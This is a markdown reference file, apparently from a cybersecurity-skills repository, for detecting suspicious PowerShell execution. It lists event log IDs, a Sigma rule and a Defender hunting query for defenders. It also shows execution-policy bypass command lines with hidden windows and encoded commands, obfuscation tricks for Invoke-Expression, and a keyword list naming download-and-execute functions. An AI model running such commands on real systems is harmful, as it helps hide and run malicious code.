creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-11 05:34:55 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
757f1c8eae4e288d20f7dfde7f7a42a4d30cffc7
Anthropic-Cybersecurity-Skills/skills/detecting-suspicious-powershell-execution/references/api-reference.md
T
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal 
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

100 lines
2.5 KiB
Markdown
Raw Blame History

# API Reference: Suspicious PowerShell Execution Detection
## Windows PowerShell Event Logs
### Event IDs
| Event ID | Log | Description |
|----------|-----|-------------|
| 4104 | PowerShell/Operational | Script block logging |
| 4103 | PowerShell/Operational | Module logging |
| 800 | PowerShell | Pipeline execution details |
| 400 | PowerShell | Engine lifecycle (start) |
| 403 | PowerShell | Engine lifecycle (stop) |
### Script Block Logging Query
```powershell
Get-WinEvent -FilterHashtable @{
LogName = 'Microsoft-Windows-PowerShell/Operational'
Id = 4104
} -MaxEvents 100
```
### Event 4104 Properties
| Index | Field | Description |
|-------|-------|-------------|
| 0 | MessageNumber | Block sequence number |
| 1 | MessageTotal | Total blocks in script |
| 2 | ScriptBlockText | Actual script content |
| 3 | ScriptBlockId | Unique script ID |
| 4 | Path | Script file path |
## Suspicious PowerShell Patterns
### Execution Policy Bypass
```powershell
powershell -ExecutionPolicy Bypass -File script.ps1
powershell -ep bypass -nop -w hidden -enc <base64>
```
### Common Obfuscation Techniques
| Technique | Example |
|-----------|---------|
| Concatenation | `"Inv"+"oke-Ex"+"pression"` |
| Variable substitution | `${I`nv`oke-`Ex`pression}` |
| Encoded commands | `-enc SQBuAHYAbwBrAGUALQA...` |
| Char array | `[char[]]@(73,69,88) -join ''` |
## Sigma Detection Rules
### Suspicious PowerShell Command Line
```yaml
title: Suspicious PowerShell Invocation
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains:
- '-enc'
- '-EncodedCommand'
- 'FromBase64String'
- 'DownloadString'
- 'Invoke-Expression'
condition: selection
level: high
```
## AMSI (Antimalware Scan Interface)
### AMSI Scan Functions
```c
HRESULT AmsiScanBuffer(
HAMSICONTEXT amsiContext,
PVOID buffer,
ULONG length,
LPCWSTR contentName,
HAMSISESSION amsiSession,
AMSI_RESULT *result
);
```
### AMSI Results
| Value | Meaning |
|-------|---------|
| 0 | Clean |
| 1 | Not Detected |
| 16384 | Blocked by admin |
| 32768 | Detected (malware) |
## Microsoft Defender ATP API
### Advanced Hunting Query
```http
POST https://api.security.microsoft.com/api/advancedqueries/run
Authorization: Bearer {token}
{
"Query": "DeviceProcessEvents | where FileName == 'powershell.exe' | where ProcessCommandLine has_any('encodedcommand','downloadstring','invoke-expression') | project Timestamp, DeviceName, ProcessCommandLine | take 100"
}
```
Reference in New Issue View Git Blame Copy Permalink